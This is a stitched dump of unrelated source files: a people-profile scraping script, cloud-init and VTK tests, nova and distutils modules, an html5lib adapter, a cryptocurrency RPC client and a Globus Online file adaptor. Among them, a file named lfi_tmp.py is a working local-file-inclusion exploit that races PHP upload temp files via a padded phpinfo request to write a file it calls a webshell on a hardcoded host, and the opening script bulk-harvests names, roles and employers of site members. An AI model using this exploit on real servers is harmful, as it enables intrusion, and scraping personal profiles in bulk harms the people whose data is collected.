org = '"' + temp[temp.find("at")+2:].strip() + '"'
except:
#pass
continue #We cannot do anything without role, so move on to next record
try:
#temp = user.xpath("dl[@class='demographic']//text()")
#location = '"' + temp[1] + '"'
location = '"' + user.find('dl',{'class':'demographic'}).find_all('dd')[0].text
#industry = '"' + temp[3] + '"'
industry = '"' + user.find('dl',{'class':'demographic'}).find_all('dd')[1].text
except:
pass
records.append(name + "," + role + "," + org + "," + location + "," + industry + "\n")
try:
logger.debug("Parsing members for company - " + company.replace("\n",""))
next_page = d.find_element_by_partial_link_text('Next')
next_page.click()
time.sleep(random.randint(min_wait,max_wait))
						tree = BeautifulSoup(d.page_source, "html.parser")
except:
tree = None
pass
file_name = company.replace("\n","").replace(" ", "_").lower()
wrote_header = False
if os.path.isfile(file_name + '.csv'): #file exists don't write header
wrote_header = True
with open(file_name + '.csv', 'a') as f:
for record in records:
if wrote_header == False:
f.write("name, role, org, location, industry" + "\n")
wrote_header = True
f.write(record)
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
with open('companies_done','a') as f:
f.write(company)
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
d.quit() if d != None else None
if __name__ == '__main__':
main()
|
cloudsigma/cloud-init
|
refs/heads/master
|
tests/unittests/test_distros/test_sysconfig.py
|
8
|
from mocker import MockerTestCase
import re
from cloudinit.distros.parsers.sys_conf import SysConf
# Lots of good examples @
# http://content.hccfl.edu/pollock/AUnix1/SysconfigFilesDesc.txt
class TestSysConfHelper(MockerTestCase):
# This function was added in 2.7, make it work for 2.6
def assertRegMatches(self, text, regexp):
regexp = re.compile(regexp)
self.assertTrue(regexp.search(text),
msg="%s must match %s!" % (text, regexp.pattern))
def test_parse_no_change(self):
contents = '''# A comment
USESMBAUTH=no
KEYTABLE=/usr/lib/kbd/keytables/us.map
SHORTDATE=$(date +%y:%m:%d:%H:%M)
HOSTNAME=blahblah
NETMASK0=255.255.255.0
# Inline comment
LIST=$LOGROOT/incremental-list
IPV6TO4_ROUTING='eth0-:0004::1/64 eth1-:0005::1/64'
ETHTOOL_OPTS="-K ${DEVICE} tso on; -G ${DEVICE} rx 256 tx 256"
USEMD5=no'''
conf = SysConf(contents.splitlines())
self.assertEquals(conf['HOSTNAME'], 'blahblah')
self.assertEquals(conf['SHORTDATE'], '$(date +%y:%m:%d:%H:%M)')
# Should be unquoted
self.assertEquals(conf['ETHTOOL_OPTS'], ('-K ${DEVICE} tso on; '
'-G ${DEVICE} rx 256 tx 256'))
self.assertEquals(contents, str(conf))
def test_parse_shell_vars(self):
contents = 'USESMBAUTH=$XYZ'
conf = SysConf(contents.splitlines())
self.assertEquals(contents, str(conf))
conf = SysConf('')
conf['B'] = '${ZZ}d apples'
# Should be quoted
self.assertEquals('B="${ZZ}d apples"', str(conf))
conf = SysConf('')
conf['B'] = '$? d apples'
self.assertEquals('B="$? d apples"', str(conf))
contents = 'IPMI_WATCHDOG_OPTIONS="timeout=60"'
conf = SysConf(contents.splitlines())
self.assertEquals('IPMI_WATCHDOG_OPTIONS=timeout=60', str(conf))
def test_parse_adjust(self):
contents = 'IPV6TO4_ROUTING="eth0-:0004::1/64 eth1-:0005::1/64"'
conf = SysConf(contents.splitlines())
# Should be unquoted
self.assertEquals('eth0-:0004::1/64 eth1-:0005::1/64',
conf['IPV6TO4_ROUTING'])
conf['IPV6TO4_ROUTING'] = "blah \tblah"
contents2 = str(conf).strip()
# Should be requoted due to whitespace
self.assertRegMatches(contents2,
r'IPV6TO4_ROUTING=[\']blah\s+blah[\']')
def test_parse_no_adjust_shell(self):
conf = SysConf(''.splitlines())
conf['B'] = ' $(time)'
contents = str(conf)
self.assertEquals('B= $(time)', contents)
def test_parse_empty(self):
contents = ''
conf = SysConf(contents.splitlines())
self.assertEquals('', str(conf).strip())
def test_parse_add_new(self):
contents = 'BLAH=b'
conf = SysConf(contents.splitlines())
conf['Z'] = 'd'
contents = str(conf)
self.assertIn("Z=d", contents)
self.assertIn("BLAH=b", contents)
|
cloudbase/nova
|
refs/heads/master
|
nova/i18n.py
|
86
|
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""oslo.i18n integration module.
See http://docs.openstack.org/developer/oslo.i18n/usage.html .
"""
import oslo_i18n
DOMAIN = 'nova'
_translators = oslo_i18n.TranslatorFactory(domain=DOMAIN)
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
def translate(value, user_locale):
return oslo_i18n.translate(value, user_locale)
def get_available_languages():
return oslo_i18n.get_available_languages(DOMAIN)
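# Illustrative usage (a sketch; LOG and exception.NovaException belong to the
# calling module and are assumptions, not part of this file):
#
#   from nova.i18n import _, _LW
#
#   LOG.warning(_LW("Unable to reach host %s"), host)
#   raise exception.NovaException(_("Invalid request"))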
|
barbarubra/Don-t-know-What-i-m-doing.
|
refs/heads/master
|
python/src/Lib/distutils/command/install_headers.py
|
53
|
"""distutils.command.install_headers
Implements the Distutils 'install_headers' command, to install C/C++ header
files to the Python include directory."""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: install_headers.py 61000 2008-02-23 17:40:11Z christian.heimes $"
from distutils.core import Command
class install_headers (Command):
description = "install C/C++ header files"
user_options = [('install-dir=', 'd',
"directory to install header files to"),
('force', 'f',
"force installation (overwrite existing files)"),
]
boolean_options = ['force']
def initialize_options (self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options (self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def run (self):
headers = self.distribution.headers
if not headers:
return
self.mkpath(self.install_dir)
for header in headers:
(out, _) = self.copy_file(header, self.install_dir)
self.outfiles.append(out)
def get_inputs (self):
return self.distribution.headers or []
def get_outputs (self):
return self.outfiles
# class install_headers
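# Illustrative usage (a sketch, not part of this module): the command installs
# whatever the 'headers' argument of distutils.core.setup() lists, e.g.
#
#   setup(name='example', version='1.0', headers=['include/example.h'])
#
# and is then run as: python setup.py install_headers --install-dir=/usr/local/include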
|
demarle/VTK
|
refs/heads/master
|
Filters/General/Testing/Python/WarpToImage.py
|
20
|
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# create a rendering window
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.SetSize(200,200)
wavelet = vtk.vtkRTAnalyticSource()
wavelet.SetWholeExtent(-100,100,-100,100,0,0)
wavelet.SetCenter(0,0,0)
wavelet.SetMaximum(255)
wavelet.SetStandardDeviation(.5)
wavelet.SetXFreq(60)
wavelet.SetYFreq(30)
wavelet.SetZFreq(40)
wavelet.SetXMag(10)
wavelet.SetYMag(18)
wavelet.SetZMag(5)
wavelet.SetSubsampleRate(1)
warp = vtk.vtkWarpTo()
warp.SetInputConnection(wavelet.GetOutputPort())
warp.SetScaleFactor(0)
warp.SetPosition(0,0,0)
mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(warp.GetOutputPort())
mapper.SetScalarRange(75,290)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
renderer = vtk.vtkRenderer()
renderer.AddActor(actor)
renderer.ResetCamera()
renWin.AddRenderer(renderer)
warp.SetScaleFactor(0.25)
warp.SetPosition(75,75,0)
warp.Update()
# --- end of script --
|
zstyblik/infernal-twin
|
refs/heads/master
|
build/pip/build/lib.linux-i686-2.7/pip/_vendor/html5lib/treeadapters/sax.py
|
1835
|
from __future__ import absolute_import, division, unicode_literals
from xml.sax.xmlreader import AttributesNSImpl
from ..constants import adjustForeignAttributes, unadjustForeignAttributes
prefix_mapping = {}
for prefix, localName, namespace in adjustForeignAttributes.values():
if prefix is not None:
prefix_mapping[prefix] = namespace
def to_sax(walker, handler):
"""Call SAX-like content handler based on treewalker walker"""
handler.startDocument()
for prefix, namespace in prefix_mapping.items():
handler.startPrefixMapping(prefix, namespace)
for token in walker:
type = token["type"]
if type == "Doctype":
continue
elif type in ("StartTag", "EmptyTag"):
attrs = AttributesNSImpl(token["data"],
unadjustForeignAttributes)
handler.startElementNS((token["namespace"], token["name"]),
token["name"],
attrs)
if type == "EmptyTag":
handler.endElementNS((token["namespace"], token["name"]),
token["name"])
elif type == "EndTag":
handler.endElementNS((token["namespace"], token["name"]),
token["name"])
elif type in ("Characters", "SpaceCharacters"):
handler.characters(token["data"])
elif type == "Comment":
pass
else:
assert False, "Unknown token type"
for prefix, namespace in prefix_mapping.items():
handler.endPrefixMapping(prefix)
handler.endDocument()
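# Illustrative usage (a sketch; the html5lib entry points and the no-op
# ContentHandler are assumptions, not part of this module):
#
#   import html5lib
#   from xml.sax.handler import ContentHandler
#
#   document = html5lib.parse("<p>Hello</p>", treebuilder="etree")
#   walker = html5lib.getTreeWalker("etree")
#   to_sax(walker(document), ContentHandler())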
|
lycancoin/lycancoin-release
|
refs/heads/master
|
contrib/bitrpc/bitrpc.py
|
2
|
from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
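# Illustrative invocations (a sketch, not part of this script):
#   python bitrpc.py getinfo
#   python bitrpc.py getbalance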
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Lycancoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Lycancoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
			print access.getwork(data)
except:
			print access.getwork()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
|
hackersql/sq1map
|
refs/heads/master
|
Web/信息收集/pentest_tools/漏洞利用/web漏洞/lfi/lfi_tmp.py
|
1
|
#!/usr/bin/env python
# encoding=utf-8
# Author : idwar
# http://secer.org
'''
Things you may need to change:
1. host
2. port
3. the name and path of the phpinfo page in the request
4. the url in the hello_lfi() function, i.e. the page and parameter with the LFI
5. if it does not work or errors out, try raising the padding length to 7000 or 8000
6. if magic_quotes_gpc or something else prevents %00, truncate another way and adjust (4) accordingly
Good Luck :)
7. the ./ in the payload refers to the directory of this script, so mind the final output
'''
import re
import urllib2
import hashlib
from socket import *
from time import sleep
host = '192.168.227.133'
#host = gethostbyname(domain)
port = 80
shell_name = hashlib.md5(host).hexdigest() + '.php'
pattern = re.compile(r'''\[tmp_name\]\s=>\s(.*)\W*error]''')
payload = '''idwar<?php fputs(fopen('./''' + shell_name + '''\',"w"),"<?php phpinfo();?>")?>\r'''
req = '''-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r''' % payload
padding='A' * 8000
phpinfo_req ='''POST /phpinfo.php?a='''+padding+''' HTTP/1.0\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie='''+padding+'''\r
HTTP_ACCEPT: ''' + padding + '''\r
HTTP_USER_AGENT: ''' + padding + '''\r
HTTP_ACCEPT_LANGUAGE: ''' + padding + '''\r
HTTP_PRAGMA: ''' + padding + '''\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s''' % (len(req), host, req)
def hello_lfi():
while 1:
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(phpinfo_req)
data = ''
while r'</body></html>' not in data:
data = s.recv(9999)
search_ = re.search(pattern, data)
if search_:
tmp_file_name = search_.group(1)
url = r'http://192.168.227.133/lfi/ex1.php?f=%s' % tmp_file_name
print url
search_request = urllib2.Request(url)
search_response = urllib2.urlopen(search_request)
html_data = search_response.read()
if 'idwar' in html_data:
s.close()
return '\nDone. Your webshell is : \n\n%s\n' % ('http://' + host + '/' + shell_name)
#import sys;sys.exit()
s.close()
if __name__ == '__main__':
print hello_lfi()
print '\n Good Luck :)'
|
anisyonk/pilot
|
refs/heads/master
|
saga/adaptors/globus_online/go_file.py
|
4
|
__author__ = "Andre Merzky, Ole Weidner, Alexander Grill"
__copyright__ = "Copyright 2012-2013, The SAGA Project"
__license__ = "MIT"
""" shell based file adaptor implementation """
import radical.utils as ru
import saga.utils.pty_shell as sups
import saga.utils.misc as sumisc
import saga.adaptors.base
import saga.adaptors.cpi.filesystem
from saga.filesystem.constants import *
import re
import os
import sys
import time
import pprint
SYNC_CALL = saga.adaptors.cpi.decorators.SYNC_CALL
ASYNC_CALL = saga.adaptors.cpi.decorators.ASYNC_CALL
GO_DEFAULT_URL = "gsissh://cli.globusonline.org/"
# --------------------------------------------------------------------
# the adaptor name
#
_ADAPTOR_NAME = "saga.adaptor.globus_online_file"
_ADAPTOR_SCHEMAS = ["go+gsisftp", "go+gridftp"]
_ADAPTOR_OPTIONS = [
{
    # FIXME: the config system forces these to be strings -- they should not be,
    # and it's not even using isinstance! :/
'category' : 'saga.adaptor.globus_online_file',
'name' : 'enable_notifications',
'type' : str,
'default' : 'None',
'valid_options' : ['True', 'False', 'None'],
'documentation' : '''Enable email notifications for all file transfers.
Note that 'True' and 'False' will result in
permanent changes to your GO notification settings.
                             'None' will leave your profile's settings unchanged.''',
'env_variable' : None
},
{
    # FIXME: the config system forces these to be strings -- they should not be,
    # and it's not even using isinstance! :/
'category' : 'saga.adaptor.globus_online_file',
'name' : 'failure_mode',
'type' : str,
'default' : 'report',
'valid_options' : ['raise', 'report', 'ignore'],
    'documentation' : '''Globus-Online seems to behave erratically. This flag
                          defines how the adaptor should deal with (intermittent
                          and fatal) errors. 'raise' will cause exceptions on
all errors, 'report' will print error messages, but
otherwise continue, and 'ignore' will (duh!) ignore
errors. 'report' is the default, you should only use
'ignore' when you know what you are doing!''',
'env_variable' : None
}
]
# --------------------------------------------------------------------
# the adaptor capabilities & supported attributes
#
_ADAPTOR_CAPABILITIES = {
"metrics" : [],
"contexts" : {"x509" : "X509 proxy for Globus",
"userpass" : "username/password pair for GlobusOnline"}
}
# --------------------------------------------------------------------
# the adaptor documentation
#
_ADAPTOR_DOC = {
"name" : _ADAPTOR_NAME,
"cfg_options" : _ADAPTOR_OPTIONS,
"capabilities" : _ADAPTOR_CAPABILITIES,
"description" : """
The globusonline file adaptor. This adaptor uses the GO file transfer
service (https://www.globus.org/).
""",
"details" : """
""",
"schemas" : {"go+gsisftp" : "use globus online for gsisftp file transfer",
"go+gridftp" : "use globus online for gridftp file transfer"
}
}
# --------------------------------------------------------------------
# the adaptor info is used to register the adaptor with SAGA
_ADAPTOR_INFO = {
"name" : _ADAPTOR_NAME,
"version" : "v0.1",
"schemas" : _ADAPTOR_SCHEMAS,
"cpis" : [
{
"type" : "saga.namespace.Directory",
"class" : "GODirectory"
},
{
"type" : "saga.namespace.Entry",
"class" : "GOFile"
},
{
"type" : "saga.filesystem.Directory",
"class" : "GODirectory"
},
{
"type" : "saga.filesystem.File",
"class" : "GOFile"
}
]
}
################################################################################
# The adaptor class
class Adaptor (saga.adaptors.base.Base):
"""
This is the actual adaptor class, which gets loaded by SAGA (i.e. by the
SAGA engine), and which registers the CPI implementation classes which
provide the adaptor's functionality.
"""
# --------------------------------------------------------------------------
#
def __init__ (self) :
saga.adaptors.base.Base.__init__ (self, _ADAPTOR_INFO, _ADAPTOR_OPTIONS)
self.opts = self.get_config (_ADAPTOR_NAME)
self.notify = self.opts['enable_notifications'].get_value ()
self.f_mode = self.opts['failure_mode'].get_value ()
self.shells = dict () # keep go shells for each session
# --------------------------------------------------------------------------
#
def sanity_check (self) :
pass
# --------------------------------------------------------------------------
#
def get_go_shell (self, session, go_url=None) :
# this basically return a pty shell for
#
# gsissh [email protected]
#
        # X509 contexts are preferred, but ssh contexts, userpass and myproxy can
        # also be used.  If the given url has username / password encoded, we
        # create a userpass context out of it and add it to (a copy of) the
        # session.
sid = session._id
if not sid in self.shells :
self.shells[sid] = dict ()
if not go_url :
new_url = saga.Url (GO_DEFAULT_URL)
else :
new_url = saga.Url (go_url) # deep copy
# create the shell.
shell = sups.PTYShell (new_url, session, self._logger, posix=False)
self.shells[sid]['shell'] = shell
# confirm the user ID for this shell
self.shells[sid]['user'] = None
_, out, _ = shell.run_sync ('profile')
for line in out.split ('\n') :
if 'User Name:' in line :
self.shells[sid]['user'] = line.split (':', 2)[1].strip ()
self._logger.debug ("using account '%s'" % self.shells[sid]['user'])
break
if not self.shells[sid]['user'] :
raise saga.NoSuccess ("Could not confirm user id")
if self.notify != 'None' :
if self.notify == 'True' :
self._logger.debug ("disable email notifications")
shell.run_sync ('profile -n on')
else :
self._logger.debug ("enable email notifications")
shell.run_sync ('profile -n off')
# for this fresh shell, we get the list of public endpoints. That list
# will contain the set of hosts we can potentially connect to.
self.get_go_endpoint_list (session, shell, fetch=True)
# pprint.pprint (self.shells)
# we have the shell for sure by now -- return it!
return self.shells[session._id]['shell']
# ----------------------------------------------------------------
#
def get_go_endpoint_ids (self, session, url) :
sid = session._id
if not sid in self.shells :
            raise saga.IncorrectState ("GO shell disconnected")
schemas = [x for x in url.schema.split ('+') if x != 'go']
ep_str = "%s_%s" % ("_".join (schemas), url.host)
ep_name = "%s#%s" % (self.shells[sid]['user'], ep_str)
ep_url = saga.Url ()
ep_url.schema = "+".join (schemas)
ep_url.host = url.host
ep_url.port = url.port
return ep_str, ep_name, ep_url
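        # Illustrative example (hypothetical host and user): for the url
        # 'go+gridftp://host.example.org' and a GO account 'alice', the above yields
        #     ep_str  = 'gridftp_host.example.org'
        #     ep_name = 'alice#gridftp_host.example.org'
        #     ep_url  = 'gridftp://host.example.org'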
# ----------------------------------------------------------------
#
def get_path_spec (self, session, url, path=None, cwd_url=None, cwd_path=None) :
# we assume that, whenever we request a path spec, we also want to use
# it, and we thus register and activate the endpoint, if needed.
sid = session._id
if not sid in self.shells :
            raise saga.IncorrectState ("GO shell disconnected")
shell = self.shells[sid]['shell']
url = saga.Url (url)
if not path :
path = url.path
if not cwd_url :
cwd_url = saga.Url (url)
if not cwd_path :
cwd_path = '.'
else :
if not cwd_path :
cwd_path = cwd_url.path
if not url.host : url.host = cwd_url.host
if not url.schema : url.schema = cwd_url.schema
if not url.host : raise saga.BadParameter ('need host for GO ops')
if not url.schema : raise saga.BadParameter ('need schema for GO ops')
ep_str, ep_name, ep_url = self.get_go_endpoint_ids (session, url)
# if both URLs point into the same namespace, and if the given path is
# not absolute, then expand it relative to the cwd_path (if it exists).
        # Otherwise the path is left unmodified.
ps_path = path
if sumisc.url_is_compatible (cwd_url, url) :
if not path.startswith ('/') :
if cwd_path :
ps_path = "%s/%s" % (cwd_path, path)
# the pathspec is the concatenation of ps_host and ps_path by a colon
ps = "%s:%s" % (ep_str, ps_path)
# check if we know the endpoint in ep_str, and create/activate as needed
ep = self.get_go_endpoint (session, shell, ep_url)
return ps
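        # Illustrative example (hypothetical values): with a cwd of
        # 'gridftp_host.example.org:/home/alice' and a relative path 'data/f.txt',
        # the resulting path spec would be
        #     'gridftp_host.example.org:/home/alice/data/f.txt'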
# ----------------------------------------------------------------
#
def get_go_endpoint (self, session, shell, url) :
# for the given URL, derive the endpoint string.
# FIXME: make sure that the endpoint is activated
ep_str, ep_name, ep_url = self.get_go_endpoint_ids (session, url)
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=False)
if not ep :
# if not, check if it was created meanwhile (fetch again)
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=True)
if not ep :
# if not, create it, activate it, and refresh all entries
shell.run_sync ("endpoint-add %s -p %s" % (ep_name, ep_url))
# refresh endpoint entries again
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=True)
if not ep :
# something above must have failed ...
raise saga.NoSuccess ("endpoint initialization failed")
# we have the endpoint now, for sure -- make sure its activated
if not ep['Credential Status'] == 'ACTIVE' :
shell.run_sync ("endpoint-activate -g %s" % ep_name)
# reload list to check status
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=True)
if not ep['Credential Status'] == 'ACTIVE' :
raise saga.AuthorizationFailed ("endpoint activation failed")
return ep
# ----------------------------------------------------------------
#
def get_go_endpoint_list (self, session, shell, ep_name=None, fetch=False) :
        # if fetch is True, query the shell for an updated endpoint list.
# then check if the given ep_name is a known endpoint name, and if so,
# return that entry -- otherwise return None. If no ep_name is given,
# and fetch is True, we thus simply refresh the internal list.
self._logger.debug ("updating endpoint list (%s, %s)" % (ep_name, fetch))
if fetch :
endpoints = dict ()
name = None
_, out, _ = shell.run_sync ("endpoint-list -v")
for line in out.split ('\n') :
elems = line.split (':', 1)
if len(elems) != 2 :
continue
key = elems[0].strip ()
val = elems[1].strip ()
if not key or not val :
continue
if key == "Name" :
# we now operate on a new entry -- initialize it
name = val
endpoints[name] = dict()
# we make sure that some entries always exist, to simplify error
# checks
endpoints[name]['Name'] = name
endpoints[name]['Credential Status'] = None
endpoints[name]['Host(s)'] = None
else :
if name :
endpoints[name][key] = val
            # replace the ep info dict with the new one, to clean out old entries.
self.shells[session._id]['endpoints'] = endpoints
if ep_name :
# return the requested entry, or None
return self.shells[session._id]['endpoints'].get (ep_name, None)
# ----------------------------------------------------------------
#
def run_go_cmd (self, shell, cmd, mode=None) :
# available modes:
# raise : raise NoSuccess on error
# report: print error message, but continue
# ignore: do nothing
if not mode :
mode = self.f_mode
_, out, err = shell.run_sync (cmd)
        # see if the second line starts with 'Error'. Note that this assumes
        # that the command itself is only one line...
lines = out.split ('\n')
if len(lines) > 1 :
if lines[1].startswith ('Error:') :
err = "%s\n%s" % (err, '\n'.join (lines))
out = None
else :
# on success, we always remove the first line, as that is not
# part of the output, really (this shell does not support
                # 'stty -echo'...)
out = '\n'.join (lines[1:])
if err :
if mode == 'raise' :
# FIXME: a 'translate_exception' call would be useful here...
raise saga.NoSuccess ("Error in '%s': %s" % (cmd, err))
if mode == 'report' :
self._logger.error ("Error in '%s': %s" % (cmd, err))
if mode == 'silent' :
pass
return out, err
# ----------------------------------------------------------------
#
def mkparents (self, session, shell, tgt_ps) :
# GO does not support mkdir -p, so we need to split the dir into
# elements and create one after the other, ignoring errors for already
# existing elements.
host_ps, path_ps = tgt_ps.split (':', 1)
self._logger.info ('mkparents %s' % path_ps)
if path_ps.startswith ('/') : cur_path = ''
else : cur_path = '.'
error = dict()
path_elems = filter (None, path_ps.split ('/'))
for path_elem in path_elems :
cur_path = "%s/%s" % (cur_path, path_elem)
out, err = self.run_go_cmd (shell, "mkdir %s:%s" % (host_ps, cur_path))
if err :
error[cur_path] = err
if len(error) :
            # some mkdir gave an error.  Check if the error occurred on the last
            # dir (the tgt); an ignorable 'already exists' report is tolerated --
            # anything else will raise an exception though...
if cur_path in error :
if not 'Path already exists' in error[cur_path] :
if self.f_mode == 'raise' :
# FIXME: a 'translate_exception' call would be useful here...
raise saga.NoSuccess ("Could not make dir hierarchy: %s" % str(error))
if self.f_mode == 'report' :
self._logger.error ("Could not make dir hierarchy: %s" % str(error))
if self.f_mode == 'silent' :
pass
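        # Illustrative example: for a tgt_ps of 'ep:/data/run1/out' this issues
        # "mkdir ep:/data", "mkdir ep:/data/run1" and "mkdir ep:/data/run1/out";
        # errors on the parent elements are ignored, and a 'Path already exists'
        # error on the final element is tolerated.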
################################################################################
#
class GODirectory (saga.adaptors.cpi.filesystem.Directory) :
""" Implements saga.adaptors.cpi.filesystem.Directory """
# ----------------------------------------------------------------
#
def __init__ (self, api, adaptor) :
